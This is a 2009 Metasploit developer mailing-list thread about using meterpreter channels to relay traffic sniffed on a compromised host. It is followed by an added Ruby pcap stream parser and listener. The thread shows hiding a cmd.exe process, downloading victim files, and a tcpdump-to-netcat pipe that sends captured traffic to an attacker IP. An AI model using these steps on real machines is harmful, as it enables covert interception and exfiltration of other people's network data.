Hi again Anastasios,

Quick question... is there anything in the Metasploit Rex library that would allow me to start up a listener similar to netcat directly in Metasploit? This way, I could receive the results of my remote sniffing directly in my program and analyze it in real time...

Also, I've figured out how to access the channel created for an executed process. Do you know of any way I could pipe output from a command I execute on the compromised machine to the channel? For example, if I run tcpdump on the compromised host, I can read the output of the command via the channel. However, this output is not in pcap format. In order to get it in pcap format, I have to use the '-w' option to write it to a file in pcap format. I can tell '-w' to write the data in pcap format to stdin using '-' as the value for '-w', then pipe stdin to something like netcat. In turn, I'd like to be able to either pipe the data to the channel, or pipe it to netcat and hopefully use something in the Rex library to receive the pcap data... What do you think?

--
Thanks!
Bryan

2009/2/9 Anastasios Monachos <anastasi...@gmail.com>

> 2009/2/9 Bryan Richardson <btri...@gmail.com>
>
>> Thanks Anastasios,
>>
>> So, am I correct in assuming this is how one is dumped into a Windows
>> shell after executing an exploit on a vulnerable Windows machine?
>>
>
> Bryan, if I am following you correctly, yes, using the download command
> supplied by the meterpreter payload you can get a file from the victim's machine to
> your machine. Note that in the case of Windows you will have to escape the \
> with an extra \ when (if) specifying the full path of the file's source and
> destination; obviously if you do "download file.txt file.txt" it will try to
> get the file from the victim's current directory and save it to your current
> directory.
>
>
>> I was hoping that I could 'channelize' a traffic sniffer such that the
>> sniffed traffic would be sent back to me in real time for real time
>> analysis... it doesn't seem like this is the case.
>>
>
> I agree, real-time traffic in some environments really helps the whole task.
>
>
>> Ultimately, what would be cool is to have my real-time traffic analysis
>> software listening on a particular port and have some way of sending the
>> sniffed traffic from the compromised machine to that particular port on my
>> local machine.
>>
>
> I think it's worth trying to pipe your live data through nc as we do with dd,
> but I am not sure if it will work in your case; oh, you will have to let your
> nc traffic pass the firewall.
>
> For example:
> On victim you can try something like: tcpdump -e host victim_ip and port 23 | nc attacker_IP attacker_listening_port
> On attacker: nc -l -p attacker_listening_port | wireshark -i -
>
> Taken from wireshark's man:
> " .... Pipe names should be either the name of a FIFO (named pipe) or
> ''-'' to read data from the standard input. Data read from pipes
> must be in standard libpcap format...."
>
> Last, you may also play with the channel read/write options, so as to pass nc's
> traffic through the channel (?), maybe someone else can reach more light
> here.
>
> Let us know what worked and what didn't anyway.
>
> Tasos
>
>
>> --
>> Bryan
>>
>> On Mon, Feb 9, 2009 at 2:26 PM, Anastasios Monachos <
>> anastasi...@gmail.com> wrote:
>>
>>> 2009/2/9 Bryan Richardson <btri...@gmail.com>
>>>
>>>> Hello All,
>>>>
>>>> Would someone mind explaining to me what 'channelized' is and how it
>>>> works?
>>>>
>>>
>>> You can use "channelisation" in cases where you wish to work with
>>> multiple communication channels that will be tunnelled through one TCP/IP
>>> session.
>>>
>>> Channels are supported by the meterpreter payload, and to channelise you
>>> can do:
>>>
>>> meterpreter > execute -f cmd.exe -H -c    //this will execute the file
>>> cmd.exe, it will hide the process window and it will channelise the task
>>>
>>> Process 1234 created.    //this is output from meterpreter
>>>
>>> Channel 2 created.    //this is output from meterpreter
>>>
>>> meterpreter >    //now use meterpreter as usual to do your other stuff
>>>
>>> meterpreter > interact 2    //now interact with channelised cmd.exe
>>>
>>>
>>>> I'm wanting to try and use it to send sniffed traffic back to me from a
>>>> compromised machine that I upload a traffic sniffer to...
>>>>
>>>
>>> For already saved captured data you could use the upload/download
>>> commands (again from within meterpreter).
>>>
>>>> --
>>>> Thanks!
>>>> Bryan
>>>>
>>>> _______________________________________________
>>>> Framework-Hackers mailing list
>>>> Framework-Hackers@spool.metasploit.com
>>>> http://spool.metasploit.com/mailman/listinfo/framework-hackers
>>>>
>>>
>>> --
>>> AM
>>
>
> --
> AM
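The thread's receiving side is "nc -l -p port | wireshark -i -", which trusts whatever arrives on the socket to be a well-formed libpcap stream. The following is an added example written for this page; it is not code from the thread, from Metasploit or from the Rex library. It shows what the analysis endpoint Bryan describes has to do with the bytes "tcpdump -w -" produces: parse the 24-byte pcap global header (both byte orders, microsecond and nanosecond magics), then consume 16-byte record headers plus packet data as they stream in, rejecting records whose caplen exceeds the negotiated snaplen so a corrupt or hostile stream cannot make the reader allocate arbitrary buffers. It uses Ruby's standard-library TCPServer instead of Rex (an assumption, so it runs without the framework); the function names, the sample pcap bytes and the summary format are all constructed for this example.

```ruby
require 'socket'
require 'stringio'

# Hypothetical helper names for this example; not part of Rex or Metasploit.
PcapHeader = Struct.new(:endian, :nsec, :version, :snaplen, :linktype)
PcapPacket = Struct.new(:ts_sec, :ts_frac, :caplen, :origlen, :data)

LINKTYPE_ETHERNET = 1

# Read exactly n bytes from any IO (socket, pipe, StringIO); nil on EOF.
def read_exact(io, n)
  buf = +''
  while buf.bytesize < n
    chunk = io.read(n - buf.bytesize)
    return nil if chunk.nil? || chunk.empty?
    buf << chunk
  end
  buf
end

# Parse the libpcap global header. The magic number tells us the byte order
# of every later field and whether timestamps are micro- or nanoseconds.
def parse_pcap_header(io)
  raw = read_exact(io, 24)
  raise 'short pcap global header' unless raw
  case raw[0, 4].unpack1('V')           # read as little-endian, then classify
  when 0xa1b2c3d4 then endian, nsec = :little, false
  when 0xa1b23c4d then endian, nsec = :little, true
  when 0xd4c3b2a1 then endian, nsec = :big, false
  when 0x4d3cb2a1 then endian, nsec = :big, true
  else raise format('not a pcap stream (magic 0x%08x)', raw[0, 4].unpack1('V'))
  end
  u16 = endian == :little ? 'v' : 'n'
  u32 = endian == :little ? 'V' : 'N'
  major, minor = raw[4, 4].unpack("#{u16}#{u16}")
  # bytes 8..15 are thiszone and sigfigs, which we do not need
  snaplen, linktype = raw[16, 8].unpack("#{u32}#{u32}")
  PcapHeader.new(endian, nsec, [major, minor], snaplen, linktype)
end

# Yield one PcapPacket per record as it arrives; stops cleanly at EOF.
def each_pcap_packet(io, header)
  return enum_for(:each_pcap_packet, io, header) unless block_given?
  u32 = header.endian == :little ? 'V' : 'N'
  loop do
    rec = read_exact(io, 16)
    break if rec.nil?                    # clean EOF between records
    ts_sec, ts_frac, caplen, origlen = rec.unpack("#{u32}*")
    # Sanity check: caplen is bounded by snaplen, so a corrupt or malicious
    # stream cannot ask us to buffer a multi-gigabyte "packet".
    raise "caplen #{caplen} exceeds snaplen #{header.snaplen}" if caplen > header.snaplen
    data = read_exact(io, caplen)
    raise 'truncated packet record' if data.nil?
    yield PcapPacket.new(ts_sec, ts_frac, caplen, origlen, data)
  end
end

# Minimal real-time analysis: count packets, captured bytes and, for
# Ethernet captures, the EtherType distribution.
def summarize_pcap(io)
  header = parse_pcap_header(io)
  summary = { linktype: header.linktype, packets: 0, bytes: 0, ethertypes: Hash.new(0) }
  each_pcap_packet(io, header) do |pkt|
    summary[:packets] += 1
    summary[:bytes] += pkt.caplen
    if header.linktype == LINKTYPE_ETHERNET && pkt.data.bytesize >= 14
      summary[:ethertypes][pkt.data[12, 2].unpack1('n')] += 1
    end
  end
  summary
end

# Listener that plays the role of "nc -l -p port" from the thread: accept one
# connection and hand the socket straight to the streaming parser.
def serve_pcap_stream(port, host = '127.0.0.1', &blk)
  server = TCPServer.new(host, port)
  client = server.accept
  header = parse_pcap_header(client)
  each_pcap_packet(client, header, &blk)
ensure
  client&.close
  server&.close
end

# Constructed sample: a little-endian, microsecond pcap with two Ethernet
# frames (one IPv4 EtherType 0x0800, one ARP EtherType 0x0806).
def build_sample_pcap
  global = [0xa1b2c3d4, 2, 4, 0, 0, 65_535, LINKTYPE_ETHERNET].pack('VvvVVVV')
  frame1 = ("\x00" * 12) + [0x0800].pack('n') + ('A' * 20)   # 34 bytes
  frame2 = ("\x00" * 12) + [0x0806].pack('n') + ('B' * 28)   # 42 bytes
  [frame1, frame2].each_with_index.map do |f, i|
    [1_234_567_890 + i, 0, f.bytesize, f.bytesize].pack('VVVV') + f
  end.inject(global, :+)
end

if __FILE__ == $PROGRAM_NAME
  p summarize_pcap(StringIO.new(build_sample_pcap))
end
```

Run stand-alone it parses the constructed sample from a StringIO; pointed at a socket via serve_pcap_stream it processes records as they arrive rather than after the capture ends, which is the real-time behaviour the thread is after. The snaplen check is the part nc-into-wireshark does not give you: with an untrusted sender, validate every length field before trusting it.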